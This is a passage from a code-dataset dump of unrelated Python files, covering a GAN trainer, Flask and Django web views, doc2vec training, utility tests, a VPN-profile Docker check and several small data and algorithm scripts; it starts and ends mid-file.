self.cam.olustur()\r\n self.cam.widg.show()\r\n \r\n def kameraAc2(self):\r\n self.cam2.widg.show()\r\n \r\n\r\n\r\n def ilDoldur(self):\r\n db = DB()\r\n liste = db.ilListele()\r\n self.win.cmbIL.addItem(\"Seçiniz\")\r\n for IlKod,IlAd in liste:\r\n self.win.cmbIL.addItem(IlAd)\r\n\r\n def kaydet(self):\r\n self.adi = self.win.txtAdi.text()\r\n self.soyadi = self.win.txtSoyadi.text() \r\n il = self.win.cmbIL.currentIndex()\r\n ilce = self.win.cmbILCE.currentIndex()\r\n db = DB()\r\n if db.PersonelEkleme(self.adi,self.soyadi,il,ilce):\r\n QMessageBox.information(self,\"Bilgi\",\"Bilgileriniz başarıyla kaydedildi\")\r\n self.win.btKamera.setEnabled(True)\r\n\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n app = QApplication(sys.argv)\r\n ex = App()\r\n sys.exit(app.exec_())","sub_path":"ilk.py","file_name":"ilk.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"417506546","text":"\n\n\"\"\"\n\t@Author: Salman Ahmed\n\n\"\"\"\n\n\n\n\n\nimport numpy as np # linear 
algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport os\nfrom keras.layers import Input, Dense, Reshape, Flatten, Dropout, Concatenate\nfrom keras.layers import BatchNormalization, Activation, ZeroPadding2D, Add\nfrom keras.layers.advanced_activations import PReLU, LeakyReLU\nfrom keras.layers.convolutional import UpSampling2D, Conv2D\nfrom keras.models import Model, Sequential\nfrom keras.optimizers import Adam\n\n\ndef build_generator(noise_shape = (100,), img_shape=(100,3,1)):\n model = Sequential()\n model.add(Dense(256, input_shape=noise_shape))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Dense(512))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Dense(1024))\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Dense(np.prod(img_shape), activation='tanh'))\n model.add(Reshape(img_shape))\n noise = Input(shape=noise_shape)\n img = model(noise)\n return Model(noise, img)\n\n\ndef build_discriminator(img_rows=100, img_cols=3, channels=1):\n img_shape = (img_rows, img_cols, channels)\n model = Sequential()\n model.add(Flatten(input_shape=img_shape))\n model.add(Dense(512))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dense(256))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dense(1, activation='sigmoid'))\n img = Input(shape=img_shape)\n validity = model(img)\n return Model(img, validity)\n\n\ndata = pd.read_csv(\"data/left_lane.csv\")\ndata.pop('action')\ndata = data.sample(frac=1)\nob_netCols = []\nk = 0\nwhile k < 300:\n ob_netCols.append(\"new_col\"+str(k))\n k += 1\nob_net = data[ob_netCols]\nob_net = np.reshape(ob_net.values, (ob_net.shape[0],100,3,1))\nob_net[ob_net>0] = 0\nob_net[ob_net==-1] = -5\nob_net = ob_net + 10\nob_net = ob_net / 10\nob_net = ob_net * 2\nob_net = ob_net - 1\ngenerator = build_generator()\ndiscriminator = build_discriminator()\ndiscriminator.compile(loss='binary_crossentropy', optimizer=Adam(0.0002, 0.5), metrics=['accuracy'])\ngenerator.compile(loss='binary_crossentropy',optimizer=Adam(0.0002, 0.5))\noverallModel = Sequential()\noverallModel.add(generator)\ndiscriminator.trainable = False\noverallModel.add(discriminator)\noverallModel.compile(loss='binary_crossentropy', optimizer=Adam(0.0002, 0.5))\nBATCH_SIZE = int(ob_net.shape[0]/3)\nindc = []\nj = 0\nwhile j < ob_net.shape[0]:\n indc.append(j)\n j+=1\nfor epoch in range(1000):\n noise = np.random.uniform(0, 1.0, size=(BATCH_SIZE,100))\n fakehR = generator.predict(noise)\n valid = np.ones((BATCH_SIZE,1))\n fake = np.zeros((BATCH_SIZE,1))\n# valid[8] = [[[0]]]\n# valid[13] = [[[0]]]\n\n\n valid = valid * (1 - 0.1)\n fake = fake + (0.1)\n\n # highR = data.sample(n=BATCH_SIZE)\n index = np.random.choice(indc, BATCH_SIZE, replace=False) \n highR = ob_net[index]\n\n discriminator.trainable = True\n d_loss_real = discriminator.train_on_batch(highR, valid)\n d_loss_fake = discriminator.train_on_batch(fakehR, fake)\n k = 0\n d_loss = (d_loss_real[0] + d_loss_fake[0]) * 0.5\n\n\n y = np.ones((BATCH_SIZE,1))\n discriminator.trainable = False\n j = 0\n while j < 5:\n noise = np.random.uniform(0, 1.0, size=(BATCH_SIZE,100))\n \n g_loss = overallModel.train_on_batch(noise,y)\n print (\"Epoch : \",epoch, \" Discriminator Loss : \", d_loss, \" Generator Loss : \", g_loss)\n 
j+=1\ngenerator.save_weights(\"Left_GEN_WEIGHTS.h5\")\n\n","sub_path":"GANS-Lane_Changes_Implementation/training/left_examples_training.py","file_name":"left_examples_training.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"184499008","text":"from flask import Flask, render_template, flash, request, url_for, redirect, session\nimport numpy as np\nimport pandas as pd\nimport os\nIMAGE_FOLDER = os.path.join('static')\napp = Flask(__name__)\n\n#model = load_model('sentiment_analysis_model.h5')\n\n@app.route('/')\ndef home():\n    return render_template('home.html')\n\n@app.route('/predict/',methods=['POST'])\ndef predict():\n    if request.method == 'POST':\n        message = request.form['message']\n        # wrap the message in a DataFrame so that .to_json(orient='records') is available\n        data = pd.DataFrame({'message': [message]})\n        json_table = data.to_json(orient='records')\n        return app.response_class(response=json_table,status=200,mimetype='application/json')\n\nif __name__ == \"__main__\":\n    #init()\n    app.run(host='127.0.0.1',port=4000)\n","sub_path":"Sentiment_Analysis-Tensorflow/text_accept.py","file_name":"text_accept.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"323381987","text":"import pandas as pd\nimport numpy as np\n# from gensim.models import doc2vec\nfrom gensim import models\nfrom gensim.models.deprecated.doc2vec import LabeledSentence\n\n\n# Filepath to main training dataset.\ntrain_file_path = \"/Users/zhewang/Documents/kaggle/train.csv\"\ndtype = {\n    'id': str,\n    'teacher_id': str,\n    'teacher_prefix': str,\n    'school_state': str,\n    'project_submitted_datetime': str,\n    'project_grade_category': str,\n    'project_subject_categories': str,\n    'project_subject_subcategories': str,\n    'project_title': str,\n    'project_essay_1': str,\n    'project_essay_2': str,\n    'project_essay_3': str,\n    'project_essay_4': str,\n    'project_resource_summary': str,\n    'teacher_number_of_previously_posted_projects': int,\n    'project_is_approved': np.uint8,\n}\n# Read data and store in DataFrame.\ntrain_data = pd.read_csv(train_file_path, sep=',', dtype=dtype, low_memory=True).sample(10000)\nessay1 = train_data['project_essay_1']\nids = train_data['id']\n\ness1_list = []\nfor index, row in train_data.iterrows():\n\tess1_list.append(LabeledSentence(row['project_essay_1'].split(\" \"), [row['id']]))\n#size is the vector length, window means how many words are included in one paragraph \nmodel = models.Doc2Vec(size = 100, window = 200, min_count = 3, workers = 1)\nmodel.build_vocab(ess1_list)\nmodel.train(ess1_list, total_examples=len(ess1_list), epochs=10)\nmodel.save(\"ess1_model.doc2vec\")\n# model_loaded = models.Doc2Vec.load('ess1_model.doc2vec')\n# print \"the first vector is: \"\n# print model.docvecs[0]\n","sub_path":"src/train-doc2vec.py","file_name":"train-doc2vec.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"508735822","text":"import json\n\nimport pytest\n\nfrom oapispec.core import utils\nfrom oapispec.core.utils import immutable\n\n\ndef test_merge_simple_dicts_without_precedence():\n    a = {'a': 'value'}\n    b = {'b': 'other value'}\n    assert utils.merge(a, b) == {'a': 'value', 'b': 'other value'}\n\ndef test_merge_simple_dicts_with_precedence():\n    a = {'a': 'value', 'ab': 'overwritten'}\n    b = {'b': 'other value', 'ab': 'keep'}\n    assert utils.merge(a, b) == {'a': 'value', 'b': 'other value', 'ab': 'keep'}\n\ndef 
test_merge_recursions():\n a = {\n 'a': 'value',\n 'ab': 'overwritten',\n 'nested_a': {\n 'a': 'nested'\n },\n 'nested_a_b': {\n 'a': 'a only',\n 'ab': 'overwritten'\n }\n }\n b = {\n 'b': 'other value',\n 'ab': 'keep',\n 'nested_b': {\n 'b': 'nested'\n },\n 'nested_a_b': {\n 'b': 'b only',\n 'ab': 'keep'\n }\n }\n assert utils.merge(a, b) == {\n 'a': 'value',\n 'b': 'other value',\n 'ab': 'keep',\n 'nested_a': {\n 'a': 'nested'\n },\n 'nested_b': {\n 'b': 'nested'\n },\n 'nested_a_b': {\n 'a': 'a only',\n 'b': 'b only',\n 'ab': 'keep'\n }\n }\n\ndef test_merge_recursions_with_empty():\n a = {}\n b = {\n 'b': 'other value',\n 'ab': 'keep',\n 'nested_b': {\n 'b': 'nested'\n },\n 'nested_a_b': {\n 'b': 'b only',\n 'ab': 'keep'\n }\n }\n assert utils.merge(a, b) == b\n\ndef test_immutable_raises_when_set():\n obj = immutable(x=2, y=23)\n\n with pytest.raises(TypeError):\n obj['x'] = 5\n\n with pytest.raises(TypeError):\n obj.x = 5\n\n with pytest.raises(TypeError):\n del obj['x']\n\n with pytest.raises(TypeError):\n del obj.x\n\ndef test_immutable_none_comparison():\n obj = immutable(x=2, y=23)\n isEqual = obj == None\n assert isEqual is not True\n\ndef test_immutable_repr_dumps_json():\n obj = immutable(x=2, y=23)\n r = repr(obj)\n json.loads(r)\n\ndef test_immutable_str_dumps_json():\n obj = immutable(x=2, y=23)\n s = str(obj)\n json.loads(s)\n\ndef test_immutable_equality():\n a = immutable(x=2, y=23)\n b = immutable(x=2, y=23)\n\n assert a == b\n","sub_path":"tests/core/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"499338226","text":"from pathlib import Path\n\ndata_folder = Path(\".\").resolve()\n\n\nmove_instr = {\"up\": (0, -1), \"down\": (0, 1), \"forward\": (1, 1)}\n\n\ndef part1(data):\n pos = [0, 0]\n for direction, distance in data:\n index, unit = move_instr[direction]\n pos[index] += unit * distance\n return pos[0] * pos[1]\n\n\ndef part2(data):\n pos = [0, 0, 0]\n for direction, distance in data:\n index, unit = move_instr[direction]\n if index == 0:\n pos[2] += unit * distance\n else:\n pos[1] += unit * distance\n pos[0] += pos[2] * distance\n return pos[0] * pos[1]\n\n\ndef parse_line(line):\n direction, distance = line.split()\n distance = int(distance)\n return direction, distance\n\n\ndef main():\n data = data_folder.joinpath(\"input.txt\").read_text()\n data = [parse_line(d) for d in data.split(\"\\n\")]\n\n sub_prod = part1(data)\n print(\"Part 1\")\n print(f\"If we multiply the final horizontal position by the final depth we get {sub_prod}\")\n print()\n\n sub_prod = part2(data)\n print(\"Part 2\")\n print(f\"If we multiply the final horizontal position by the final depth we get {sub_prod}\")\n print()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2021/02/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"269895587","text":"#!/usr/bin/python\n\nimport subprocess\nprofile_url = \"https://www.vpngate.net/common/openvpn_download.aspx?sid=1584878359201&tcp=1&host=219.100.37.144&port=443&hid=15134922&/vpngate_219.100.37.144_tcp_443.ovpn\"\np = subprocess.Popen(\"docker run -it --rm -e profile=\\\"{0}\\\" openvpncli\".format(profile_url), stdout=subprocess.PIPE, shell=True)\n \n(output, err) = p.communicate()\n \np_status = p.wait()\nresults = output.decode('utf-8')\nif \"ERROR: Cannot open TUN/TAP dev 
/dev/net/tun: No such file or directory\" in results:\n print (\"OK\")\nelse:\n print (\"ERROR\")\n","sub_path":"VPNGateValidation/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"367800356","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 29 15:33:05 2018\n\n@author: xnguyen\n\"\"\"\n\nimport tensorflow as tf\nimport itertools\n\n\ndef gen():\n for i in itertools.count(1):\n yield (i, [1] * i)\n\nds = tf.data.Dataset.from_generator(\n gen, (tf.int64, tf.int64), (tf.TensorShape([]), tf.TensorShape([None])))\nvalue = ds.make_one_shot_iterator().get_next()\n\nwith tf.Session() as sess:\n for i in range(10): \n print(sess.run(value)) # (1, array([1]))\n #print(sess.run(value)) # (2, array([1, 1]))\n\n\n# Using the generator pattern (an iterable)\nclass generator_recurrent_sin(object):\n def __init__(self, n, time_steps, input_dim, attention_column=13):\n self.n = n \n self.time_steps = time_steps\n self.input_dim = input_dim \n self.attention_column = attention_column\n self.num = 0\n \n def __iter__(self):\n return self.next()\n \n # Python 3 compatibility\n def __next__(self):\n return self.next()\n\n def next(self):\n if self.num < self.n:\n self.num += 1\n x = np.random.standard_normal(size=(self.time_steps, self.input_dim)) \n y = np.random.randint(low=0, high=2, size=(1))\n \n freq = 0\n if y ==0:\n freq = 0.1 * PI\n else:\n freq = 0.5 * PI\n for t in range(self.attention_column, int(self.attention_column+self.input_dim/2)):\n for d in range(self.attention_column):\n x[t, d] = np.sin(t*freq) + 0.05*np.random.randn(1)\n yield (x, y)\n else: \n raise StopIteration()\n\nINPUT_DIM = 32\nTIME_STEPS = 64\nHIDDEN_UNITS = 256\nATTENTION_COLUMN =10\nN=1000\n\ndef get_data_generator():\n return generator_recurrent_sin(N, TIME_STEPS, INPUT_DIM,\n ATTENTION_COLUMN)\n \ndataset = tf.data.Dataset.from_generator(get_data_generator,\n (tf.float32, tf.float32),\n (tf.TensorShape([TIME_STEPS, INPUT_DIM]),\n tf.TensorShape([1])))\nbatch_size=10\n \ndataset = dataset.shuffle(buffer_size=1024) # 1024 files in dataset\ndataset = dataset.repeat() \ndataset = dataset.apply(\n tf.contrib.data.batch_and_drop_remainder(batch_size)\n )\n \ndataset = dataset.prefetch(4)\nimages, labels = dataset.make_one_shot_iterator().get_next()\n\nwith tf.Session() as sess:\n print(sess.run([images, labels]))\n","sub_path":"test_dataset.py","file_name":"test_dataset.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"594506529","text":"# -*- coding: utf-8 -*- \nimport datetime\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom statistic.models import Phone\nfrom .models import Category, PhoneList, Version\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.template.context_processors import csrf\n\n@csrf_exempt\ndef phoneData(request):\n if request.method == 'POST':\n device_post = request.POST.get('device')\n key_post = request.POST.get('key')\n if key_post == 'KqePnWoGfHhbLCU4yoPEXi5qXWQk69IE':\n # sync++\n p = Phone.objects.get()\n p.sync_amount += 1\n if device_post == 'iOS':\n # iOS\n p.ios_sync_amount += 1\n elif device_post == 'Android':\n # Android\n p.android_sync_amount += 1\n else:\n # unrecognized device\n return None\n p.save()\n # prepare data\n phoneData = []\n for categoryData in Category.objects.all():\n categoryDict = 
{}\n categoryDict['name'] = categoryData.category_name\n listArray = []\n for listData in PhoneList.objects.filter(phone_category=categoryData):\n listArray.append({\n 'name': listData.phone_name,\n 'num1': listData.phone_num1,\n 'num2': listData.phone_num2,\n })\n categoryDict['list'] = listArray\n phoneData.append(categoryDict)\n # add Version\n v = Version.objects.get()\n jsonData = {\n 'version': v.version_num,\n 'data': phoneData,\n }\n # ensure_ascii=False Chinese\n return HttpResponse(json.dumps(jsonData, ensure_ascii=False), content_type='application/json')\n else:\n return None\n else:\n return None","sub_path":"phone/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"5797559","text":"''' graph_controllers\nroutes related to the graphs\n'''\nimport datetime\nimport json\n\nfrom flask import (render_template, request, flash, redirect, url_for, session\n , abort)\nfrom mongoengine import *\n\nfrom application import app\n\n# view controls\nfrom decorators import *\n# mongoengine models\nfrom models import *\n# some utilities\nimport utilities\n# some constants\nimport constants\n\n\ngraph_route = '/organizations//projects//graphs'\n@app.route(graph_route, defaults={'graph_label': None})\n@app.route(graph_route + '/', methods=['GET', 'POST'])\n@verification_required\n@csrf_protect\ndef graphs(org_label, project_label, graph_label):\n ''' graphin things\n /organizations/aquaya/projects/water-quality/graphs\n : view a list of all graphs for the project\n /organizations/aquaya/projects/water-quality/graphs?create=true\n : create a new graph config, immediately redirect to editing\n /organizations/aquaya/projects/water-quality/graphs/ph-vs-time\n : view a graph\n /organizations/aquaya/projects/water-quality/graphs/ph-vs-time?edit=true\n : edit a graph; accepts GET or POST\n '''\n user = User.objects(email=session['email'])[0]\n \n orgs = Organization.objects(label=org_label)\n if not orgs:\n flash('Organization \"%s\" not found, sorry!' % org_label, 'warning')\n return redirect(url_for('organizations'))\n org = orgs[0]\n\n # permission-check\n if org not in user.organizations and not user.admin_rights:\n app.logger.error('%s tried to view a project but was \\\n denied for want of admin rights' % session['email'])\n abort(404)\n \n # find the project\n projects = Project.objects(label=project_label, organization=org) \n if not projects:\n flash('Project \"%s\" not found, sorry!' 
% project_label, 'warning')\n return redirect(url_for('organizations', org_label=org.label))\n project = projects[0]\n\n if request.method == 'POST':\n # we have a graph_label\n graphs = Graph.objects(label=graph_label, project=project)\n if not graphs:\n abort(404)\n graph = graphs[0]\n\n form_type = request.form.get('form_type', '')\n if form_type == 'info':\n if graph.name != request.form.get('name', ''):\n name = request.form.get('name', '')\n graph.update(set__name = name)\n\n graphs = Graph.objects(project=project).only('label')\n labels = [g.label for g in graphs]\n graph.update(set__label = utilities.generate_label(name\n , labels))\n\n # reload to catch the name change\n graph.reload()\n\n graph.update(set__description = \n request.form.get('description', ''))\n graph.update(set__graph_type = request.form.get('graph_type', ''))\n\n # axes specify a header and come of the form 'header_id__4abcd001'\n xaxis = request.form.get('xaxis', '')\n if xaxis:\n xaxis = xaxis.split('header_id__')[1]\n header = Header.objects(id=xaxis)[0]\n graph.update(set__xaxis = header)\n\n yaxis = request.form.get('yaxis', '')\n if yaxis:\n yaxis = yaxis.split('header_id__')[1]\n header = Header.objects(id=yaxis)[0]\n graph.update(set__yaxis = header)\n\n # pie chart headers are similar to axes..\n pie_header = request.form.get('pie_header', '')\n if pie_header:\n pie_header = pie_header.split('header_id__')[1]\n header = Header.objects(id=pie_header)[0]\n graph.update(set__pie_header = header)\n\n elif form_type == 'filters':\n # extract the 'any filters' vs 'all' distinction\n filter_settings = request.form.get('apply_any_filters', '')\n if filter_settings == 'true':\n graph.update(set__apply_any_filters = True)\n else:\n graph.update(set__apply_any_filters = False)\n\n # attach filter to graph\n requested_filter_ids = request.form.getlist('filters')\n attached_filters = []\n for requested_id in requested_filter_ids:\n prefix, filter_id = requested_id.split('__')\n filters = Filter.objects(id=filter_id)\n if not filters:\n abort(404)\n attached_filters.append(filters[0])\n\n graph.update(set__filters = attached_filters)\n \n elif form_type == 'admin':\n # delete the graph\n name = graph.name\n utilities.delete_graph(graph, session['email'])\n flash('graph \"%s\" was deleted successfully' % name, 'success')\n return redirect(url_for('graphs', org_label=org.label\n , project_label=project.label))\n \n else:\n # bad 'form_type'\n abort(404)\n \n flash('changes saved successfully', 'success')\n return redirect(url_for('graphs', org_label=org.label\n , project_label=project.label, graph_label=graph.label))\n \n if request.method == 'GET':\n if graph_label:\n graphs = Graph.objects(label=graph_label, project=project)\n if not graphs:\n app.logger.error('%s tried to access a graph that does not \\\n exist' % session['email'])\n flash('Graph \"%s\" not found, sorry!' 
% graph_label\n , 'warning')\n return redirect(url_for('projects'), org_label=org.label\n , project_label=project.label)\n graph = graphs[0]\n\n if request.args.get('edit', '') == 'true':\n # valid graph types\n graph_types = ['line', 'scatter', 'bar', 'chart', 'pie']\n \n available_filters = Filter.objects(project=project)\n \n return render_template('graph_edit.html', graph=graph\n , graph_types = graph_types\n , allowed_graph_types = constants.graph_types\n , available_filters = available_filters)\n\n else:\n # render a graph\n data = []\n project_count = None\n filtered_count = None\n if graph.graph_type == 'line':\n if graph.xaxis and graph.yaxis:\n data, project_count = (\n utilities.generate_line_graph_data(graph))\n filtered_count = len(data)\n else:\n flash('define an x-axis and y-axis for plotting'\n , 'warning')\n\n elif graph.graph_type == 'pie':\n if graph.pie_header:\n data, project_count = (\n utilities.generate_pie_chart_data(graph))\n filtered_count = sum([i['data'] for i in json.loads(data)])\n else:\n flash('define a column to create this pie chart'\n , 'warning')\n\n return render_template('graph.html', graph=graph, data=data\n , project_count=project_count\n , filtered_count = filtered_count)\n\n if request.args.get('create', '') == 'true':\n # create a new graph\n\n # CSRF validation\n token = request.args.get('token', '')\n if not verify_token(token):\n abort(403)\n\n try:\n graph_name = 'graph-%s' % utilities.generate_random_string(6)\n new_graph = Graph(\n creation_time = datetime.datetime.utcnow()\n , creator = user\n , label = graph_name.lower()\n , project = project\n , name = graph_name\n )\n new_graph.save() \n app.logger.info('graph created by %s' % session['email'])\n flash('graph created; please change the defaults', 'success')\n except:\n app.logger.error('graph creation failed for %s' % \\\n session['email'])\n flash('There was an error, sorry :/', 'error')\n return redirect(url_for('projects', org_label=org.label\n , project=project.label))\n \n # redirect to the editing screen\n return redirect(url_for('graphs', org_label=org.label\n , project_label=project.label, graph_label=new_graph.label\n , edit='true'))\n \n # no graph in particular was specified\n graphs = Graph.objects(project=project)\n return render_template('project_graphs.html', project=project\n , graphs=graphs)\n\n","sub_path":"application/graph_controllers.py","file_name":"graph_controllers.py","file_ext":"py","file_size_in_byte":8998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"652182977","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n# Importamos funcion donde limpiamos nuestra data y creamos un nuevo csv\nfrom limpieza import limpiar_crear\n# Importamos nuestras funcionoes\nfrom funcionesDatos import buscar, bajas_pastel, sobrevivientesBarras, costoTickets\nimport os\n\n\nif __name__ == '__main__':\n # Llamamos la funcion para limpiar y crear un nuevo csv\n # df_raw = pd.read_excel(\"lista.xlsx\")\n # limpiar_crear(df_raw) # retornamos y cramos data.csv\n\n while True:\n os.system(\"cls\") # Limpieza de pantalla\n print(\"Menu:\")\n print(\"1. Buscar un pasajero por codigo de ticket\")\n print(\"2. Gráfica de bajas y sobrevivientes(pastel)\")\n print(\"3. Gráfica de sobrevivientes por clase(barras)\")\n print(\"4. Reporte de costos de tickets\")\n print(\"5. 
Salir\")\n\n opc = input(\"Seleccione su opción: \")\n\n if opc == \"1\":\n ticket = input(\"Digite el codigo del ticket(Ej: PC 17318 o 113781): \") # Capturando el ticket\n buscar(ticket)\n input()\n\n elif opc == \"2\":\n bajas_pastel()\n input()\n\n elif opc == \"3\":\n sobrevivientesBarras()\n input()\n\n elif opc == \"4\":\n costoTickets()\n input()\n\n elif opc == \"5\":\n print(\"Hasta pronto...\")\n input()\n break\n\n else:\n print(\"Opción incorrecta\")\n input()\n continue","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"98994393","text":"#Örnek Problem:\r\n\"\"\"\r\nmetreküpü 0.79tl olan doğalgaz Mart ayında 346metreküp harcandığına göre;\r\nkaç lira fatura geleceğini hesaplayın\r\n\"\"\"\r\n\r\nmetreküp=0.79\r\nharcanan=346\r\n\r\nfatura = metreküp*harcanan\r\nprint (fatura)\r\n\r\n\r\n# kaynak: https://python-istihza.yazbel.com/etkilesimli_python.html#karakter-dizilerine-giris","sub_path":"7-07.01.2021/ÖrnekProgramlar/ornekproblem5.py","file_name":"ornekproblem5.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"147760700","text":"# Importing relevant packages\nfrom flask import Blueprint, render_template, request, session, redirect, url_for\nfrom .models import Item, Watchlist, Bid\nfrom . import db\nfrom sqlalchemy.sql.expression import func\nfrom sqlalchemy import desc\n\n# blueprint\nbp = Blueprint('main', __name__)\n\n# Function for index page\n@bp.route('/')\ndef index():\n func.count()\n items = Item.query.all() # grabs all items in db\n # Does a bunch of filtering based on items\n featured_items = Item.query.order_by(func.random()).limit(4).all()\n CPUCategory = Item.query.order_by(func.random()).filter_by(category='CPU').limit(4)\n GPUCategory = Item.query.order_by(func.random()).filter_by(category='GPU').limit(4)\n MoboCategory = Item.query.order_by(func.random()).filter_by(category='Motherboard').limit(4)\n RAMCategory = Item.query.order_by(func.random()).filter_by(category='RAM').limit(4)\n PSUCategory = Item.query.order_by(func.random()).filter_by(category='Power Supply Unit').limit(4)\n FanCategory = Item.query.order_by(func.random()).filter_by(category='Cooling Fan').limit(4)\n # renders the page with variables\n return render_template('index.html', items=items, featured_items=featured_items, CPUCategory=CPUCategory, GPUCategory=GPUCategory, MoboCategory=MoboCategory, RAMCategory=RAMCategory, PSUCategory=PSUCategory, FanCategory=FanCategory)\n\n# Function that allows the user to search for items by name\n@bp.route('/search')\ndef search():\n # grabs the text inputted, then filters DB based on that\n if request.args['search']:\n ite = \"%\" + request.args['search'] + \"%\"\n items = Item.query.filter(Item.name.like(ite)).all()\n return render_template('index.html', search_items=items)\n else:\n return redirect(url_for('main.index'))\n\n\n\n\n","sub_path":"auction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"456324839","text":"# 6549 / calculate max rectangle area in the histogram\nfrom collections import deque\nimport sys\n\nwhile True:\n n, *num = list(map(int, sys.stdin.readline().strip().split()))\n if n == 0: # end\n break\n\n num.append(0) # for terminate histogram, append 0 to end\n area, 
hist = 0, deque()\n    for i, h in enumerate(num):\n        # while the stack is not empty and the bar on top is taller than h\n        while hist and num[hist[-1]] > h:\n            ih = num[hist.pop()] # height\n            # the width runs from the current index back to the next bar still on the stack (exclusive); if the stack is empty it runs from index 0\n            w = i - hist[-1] - 1 if hist else i\n            area = max(area, w * ih) # calculate area\n        hist.append(i) # append index\n    print(area)\n","sub_path":"stack/6549.py","file_name":"6549.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"339211422","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n# @Time : 3/29/2018 10:53 AM \n# @Author : sunyonghai \n# @File : create_Main.py \n# @Software: ZJ_AI\n# =========================================================\nimport argparse\nimport random\nimport os\nfrom data_processing.utils.io_utils import mkdir\nfrom config import ROOT_HOME\n\ndef _create_Main(path):\n    '''\n    create the trainval.txt and test.txt for training.\n    trainval data : test data = 2:1 (scale = 3 sends one third of the images to the test split)\n    :param path:\n    :return:\n    '''\n    scale = 3\n    image_dir = os.path.join(path, 'JPEGImages')\n    anno_dir = os.path.join(path, 'Annotations')\n    ImageSets_path = os.path.join(path, 'ImageSets')\n    main_dir = os.path.join(ImageSets_path, 'Main')\n\n    mkdir(main_dir)\n\n    imgs = os.listdir(image_dir)\n    random.shuffle(imgs)\n\n    trainval_test_images = []\n    trainval_images = []\n    test_images = []\n\n    for i in range(len(imgs)):\n        s = imgs[i]\n        trainval_test_images.append(s.split('.')[0] + '\\n')\n\n    for i in range(len(imgs)//scale, len(imgs)):\n        s = imgs[i]\n        trainval_images.append(s.split('.')[0] + '\\n')\n\n    for i in range(len(imgs)//scale):\n        s = imgs[i]\n        test_images.append(s.split('.')[0] + '\\n')\n\n    with open(main_dir+'/trainval_test.txt','w+') as f:\n        f.writelines(trainval_test_images)\n        print(\"{}, numbers:{}\".format(main_dir + '/trainval_test.txt', len(trainval_test_images)))\n\n    with open(main_dir+'/trainval.txt','w+') as f:\n        f.writelines(trainval_images)\n        print(\"{}, numbers:{}\".format(main_dir + '/trainval.txt', len(trainval_images)))\n    with open(main_dir+'/test.txt','w+') as f:\n        f.writelines(test_images)\n        print(\"{}, numbers:{}\".format(main_dir + '/test.txt', len(test_images)))\n\n    print('total: {}'.format(len(imgs)))\n    print('step: {}'.format(len(trainval_images)//2+1))\n\ndef create_sub_Main(dirs):\n    data_paths = [os.path.join(ROOT_HOME, s) for s in dirs]\n    for data_dir in data_paths:\n        _create_Main(data_dir)\n\ndef create_subs_Main(data_paths):\n    # dirs = ['data/train_data-2018-3-7', 'data/train_data-2018-3-16']\n    # data_paths = [os.path.join(ROOT_HOME, s) for s in dirs]\n    for data_dir in data_paths:\n        _create_Main(data_dir)\n\ndef create_txt(data_dir):\n    _create_Main(data_dir)\n\ndef create_txts(data_dirs):\n    for data_dir in data_dirs:\n        _create_Main(data_dir)\n\n# if __name__ == \"__main__\":\n#     dirs = ['data_52/train_data-2018-04-18']\n#     data_paths = [os.path.join(ROOT_HOME, s) for s in dirs]\n#     create_subs_Main(data_paths)\n\nparser = argparse.ArgumentParser(description='Get the data info')\n# parser.add_argument('-d', '--datadir', help='path in server', default='/home/syh/train_data/data/all_train_data')\n# parser.add_argument('-d', '--datadir', help='path in server', default='/home/syh/train_data/test')\nparser.add_argument('-d', '--datadir', help='path in server', default='/home/syh/tf-faster-rcnn/data/train_data/train_data-2018-04-02')\nargs = parser.parse_args()\n\nif __name__ == \"__main__\":\n    # data_dir = 
